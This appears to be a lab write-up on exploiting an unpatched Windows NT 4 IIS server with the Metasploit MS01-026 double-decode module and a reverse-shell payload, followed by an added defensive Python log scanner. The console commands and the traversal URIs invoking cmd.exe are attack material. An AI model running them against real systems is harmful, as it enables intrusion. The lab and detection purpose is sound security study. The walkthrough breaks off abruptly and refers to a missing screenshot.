In this little lab, we are going to review some known vulnerabilities in Windows NT 4 Server. We are going to start from the results of a Nessus scan and go all the way to the complete exploitation.

This is an NT 4 Server (English version) with everything left at its defaults; it also has a normal user called greg that is actually logged into the machine, and RealVNC 4.1.1.

After running a Nessus scan (without credentials) the general results are:

As you can see below, these are the details of the High Severity problems:

21564 1 VNC Security Type Enforcement Failure Remote Authentication Bypass High Severity problem(s) found
22034 1 MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check) High Severity problem(s) found
34477 1 MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) High Severity problem(s) found
35362 1 MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) High Severity problem(s) found
MS01-026 / MS01-044: Microsoft IIS Remote Command Execution (uncredentialed check)

MS01-044: Microsoft IIS Remote Command Execution

If we pay attention to the Nessus results, they also include which tools the vulnerability is exploitable with; just in case, I included this screenshot.

So, as we now know the exploit module in Metasploit, it's time to use it:

Msf exploit(ms01_026_dbldecode) > show options
Module options (exploit/windows/iis/ms01_026_dbldecode):
Name Current Setting Required Description
CMD no Execute this command instead of using command stager
Msf exploit(ms01_026_dbldecode) > set VERBOSE true
Msf exploit(ms01_026_dbldecode) > set PAYLOAD generic/shell_reverse_tcp
Msf exploit(ms01_026_dbldecode) > exploit
Copying cmd.exe to the web root as “MJE6cgs.exe”…
Executing command: copy \winnt\system32\cmd.exe MJE6cgs.exe
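The flaw behind the ms01_026_dbldecode module is that vulnerable IIS builds checked the request path after one round of percent-decoding and then decoded it a second time, so an escaped escape such as %255c passed the check and only became a backslash afterwards. The following is an added example (not code from this lab or from Metasploit) of how a defender can spot that pattern in web-server log lines by comparing the single- and double-decoded forms of each requested URI; the log lines are constructed, and the "client method uri" field layout is an assumption.

```python
"""Flag IIS double-decode (MS01-026) traversal attempts in web log lines.
Added example, not from the lab or Metasploit; the log lines are constructed
and the "client method uri" layout is an assumption."""
from typing import List, Tuple
from urllib.parse import unquote

# Constructed sample log lines: client IP, method, requested URI.
SAMPLE_LOG = """\
10.0.0.5 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
10.0.0.6 GET /default.htm
10.0.0.7 GET /docs/sales+100%2525.txt
10.0.0.8 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir
"""


def decode_twice(uri: str) -> Tuple[str, str]:
    """URI after one and after two percent-decodes. Vulnerable IIS checked
    the path after the first decode, then decoded again before using it."""
    once = unquote(uri)
    return once, unquote(once)


def classify(uri: str) -> str:
    """'traversal' if '../' or '..\\' shows after one decode (caught by the
    check), 'double-decode' if it only appears after the second decode (the
    MS01-026 pattern), otherwise 'clean'."""
    once, twice = decode_twice(uri)
    if "../" in once.replace("\\", "/"):
        return "traversal"
    if "../" in twice.replace("\\", "/"):
        return "double-decode"
    return "clean"


def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client, uri, verdict) for every non-clean request."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue  # malformed line, skip it
        verdict = classify(parts[2])
        if verdict != "clean":
            hits.append((parts[0], parts[2], verdict))
    return hits


if __name__ == "__main__":
    for client, uri, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:14} {client:10} {uri}")
```

Note that a legitimate URI containing %2525 (a literal "%25") decodes twice without ever producing a traversal, so it is reported as clean.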